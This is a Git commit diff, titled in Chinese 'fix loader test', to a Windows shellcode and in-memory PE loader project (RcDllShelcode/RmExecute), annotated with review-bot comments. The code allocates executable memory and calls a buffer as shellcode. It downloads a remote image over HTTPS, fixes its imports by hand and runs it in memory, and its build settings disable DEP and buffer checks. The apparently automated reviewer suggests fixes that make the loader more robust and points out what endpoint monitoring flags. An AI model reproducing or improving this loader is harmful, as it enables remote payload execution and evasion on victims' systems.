修复加载器测试
parent
4fa9dd09cb
commit
793daa06d5
Binary file not shown.
Binary file not shown.
|
@ -86,8 +86,12 @@ void RunShellCode()
|
||||||
typedef void(WINAPI* fnFun)(
|
typedef void(WINAPI* fnFun)(
|
||||||
char*
|
char*
|
||||||
);
|
);
|
||||||
|
PVOID p = NULL;
|
||||||
fnFun Shellcode = (fnFun)(filebuf);
|
if ((p = VirtualAlloc(NULL, filelen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
|
||||||
|
MessageBoxA(NULL, "ÉêÇëÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK);
|
||||||
|
if (!(memcpy(p, filebuf, filelen)))
|
||||||
|
MessageBoxA(NULL, "дÄÚ´æʧ°Ü", "ÌáÐÑ", MB_OK);
|
||||||
|
fnFun Shellcode = (fnFun)p;
|
||||||
Shellcode(URL);
|
Shellcode(URL);
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|
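Review bot: Both new failure branches in RunShellCode only show a message box and then fall through, so when `VirtualAlloc` returns NULL the code still reaches `memcpy(p, filebuf, filelen)` and the call through `Shellcode` with a null pointer; brace the branch and leave the function, e.g. `if (p == NULL) { MessageBoxA(...); return; }`. The `if (!(memcpy(p, filebuf, filelen)))` test can never be true because memcpy returns its destination, so that branch is dead and should be dropped, with `filebuf` and `filelen` validated before the allocation instead. The region is never released with `VirtualFree` in the visible lines, and it stays `PAGE_EXECUTE_READWRITE` for its whole lifetime, a writable-and-executable mapping that endpoint monitoring commonly flags. The function starts above the hunk, so where `filebuf`, `filelen` and `URL` come from is not visible here.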
|
@ -1,11 +0,0 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project>
|
|
||||||
<ProjectOutputs>
|
|
||||||
<ProjectOutput>
|
|
||||||
<FullPath>C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RcDllShelcode.exe</FullPath>
|
|
||||||
</ProjectOutput>
|
|
||||||
</ProjectOutputs>
|
|
||||||
<ContentFiles />
|
|
||||||
<SatelliteDlls />
|
|
||||||
<NonRecipeFileRefs />
|
|
||||||
</Project>
|
|
|
@ -1,11 +0,0 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project>
|
|
||||||
<ProjectOutputs>
|
|
||||||
<ProjectOutput>
|
|
||||||
<FullPath>C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RmExecute.exe</FullPath>
|
|
||||||
</ProjectOutput>
|
|
||||||
</ProjectOutputs>
|
|
||||||
<ContentFiles />
|
|
||||||
<SatelliteDlls />
|
|
||||||
<NonRecipeFileRefs />
|
|
||||||
</Project>
|
|
|
@ -167,7 +167,7 @@
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
<PreprocessorDefinitions>_DEBUG</PreprocessorDefinitions>
|
<PreprocessorDefinitions>_CRT_SECURE_NO_WARNINGS;_DEBUG;_CONSOLE;_LIB</PreprocessorDefinitions>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
@ -193,7 +193,7 @@
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='RUN_EXE_MT|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='RUN_EXE_MT|x64'">
|
||||||
<Link>
|
<Link>
|
||||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
<DataExecutionPrevention>false</DataExecutionPrevention>
|
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||||
|
@ -208,7 +208,7 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<SupportJustMyCode>true</SupportJustMyCode>
|
<SupportJustMyCode>true</SupportJustMyCode>
|
||||||
<OmitFramePointers>false</OmitFramePointers>
|
<OmitFramePointers>false</OmitFramePointers>
|
||||||
<PreprocessorDefinitions>RUNEXEMT;_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
|
<PreprocessorDefinitions>RUNEXEMT;_CRT_SECURE_NO_WARNINGS;_DEBUG</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
|
|
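Review bot: Adding `_DEBUG` to the RUN_EXE_MT|x64 `PreprocessorDefinitions` conflicts with `<RuntimeLibrary>MultiThreaded</RuntimeLibrary>` on the context line just below it (assuming the second printed value is the new side). `_DEBUG` makes the MSVC headers expect the debug CRT while this setting links the release one, which usually shows up as unresolved debug-CRT symbols or an `_ITERATOR_DEBUG_LEVEL` mismatch at link time. Either switch the configuration to `MultiThreadedDebug` or gate the test-only code on a project-specific macro instead of `_DEBUG`. Both rewritten values, here and in the Debug|x64 hunk, also omit `%(PreprocessorDefinitions)`, so inherited definitions are dropped. The same configuration keeps `DataExecutionPrevention` and `BufferSecurityCheck` set to `false` on the unchanged lines, which deserves a comment explaining why those mitigations are off.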
|
@ -27,7 +27,6 @@ public:
|
||||||
|
|
||||||
|
|
||||||
Functions fn;
|
Functions fn;
|
||||||
char s_runexe[260];
|
|
||||||
char* newbuff;
|
char* newbuff;
|
||||||
|
|
||||||
|
|
||||||
|
@ -38,8 +37,8 @@ public:
|
||||||
|
|
||||||
newbuff = NULL;
|
newbuff = NULL;
|
||||||
Initfunctions(&fn);
|
Initfunctions(&fn);
|
||||||
char runexe[] = { 'A', 'A','\0' };
|
|
||||||
fn.fnmemcpy(s_runexe, runexe, 260);
|
|
||||||
};
|
};
|
||||||
|
|
||||||
|
|
||||||
|
@ -67,7 +66,7 @@ public:
|
||||||
|
|
||||||
int size = HttpDownload(host, path, 443, TRUE);
|
int size = HttpDownload(host, path, 443, TRUE);
|
||||||
|
|
||||||
fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
||||||
|
|
||||||
RunPortableExecutable();
|
RunPortableExecutable();
|
||||||
|
|
||||||
|
|
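Review bot: The call at `//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);` is commented out rather than deleted; remove the line so the debugging aid does not linger in the class. On the context lines around it, `size` from `HttpDownload(host, path, 443, TRUE)` is not checked before `RunPortableExecutable()` runs, so a failed or empty download appears to go straight into the loader with `newbuff` possibly still NULL. An early exit on `size <= 0 || newbuff == NULL` belongs between the two calls, but HttpDownload's failure value is not visible here and should be confirmed. Nothing in the visible lines verifies the integrity of the downloaded image before it is mapped and run. The enclosing method begins and ends outside the hunk.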
|
@ -347,7 +347,7 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h
|
||||||
LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
|
LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
|
||||||
DWORD op;
|
DWORD op;
|
||||||
fn.fnVirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
|
fn.fnVirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
|
||||||
__try {
|
|
||||||
while (import_table->Name) {
|
while (import_table->Name) {
|
||||||
import_base = fn.fnLoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
|
import_base = fn.fnLoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
|
||||||
fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
|
fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
|
||||||
|
@ -375,10 +375,8 @@ VOID RmExecute::FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_h
|
||||||
}
|
}
|
||||||
import_table++;
|
import_table++;
|
||||||
}
|
}
|
||||||
}
|
|
||||||
__except (1) {
|
|
||||||
|
|
||||||
}
|
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
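Review bot: With the `__try`/`__except (1)` wrapper gone, the import loop in FixImageIAT depends entirely on the image being well formed. `import_table->Name` and `import_table->FirstThunk` are added to `dos_header` without a check against the image size, and the result of `fn.fnLoadLibraryA(...)` is not tested on the visible lines. Dropping the catch-all handler is reasonable because it hid every fault, but it should be replaced by explicit validation, e.g. `if (import_base == NULL) return;` after the load and an RVA bounds check before each dereference. The old protection saved in `op` by `fn.fnVirtualProtect(iat, iat_size, PAGE_READWRITE, &op)` is not restored in the lines shown; if it is not restored further down, the IAT stays writable. The loop body between the two hunks and the start of the function are outside the view.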
|
@ -1 +0,0 @@
|
||||||
213
|
|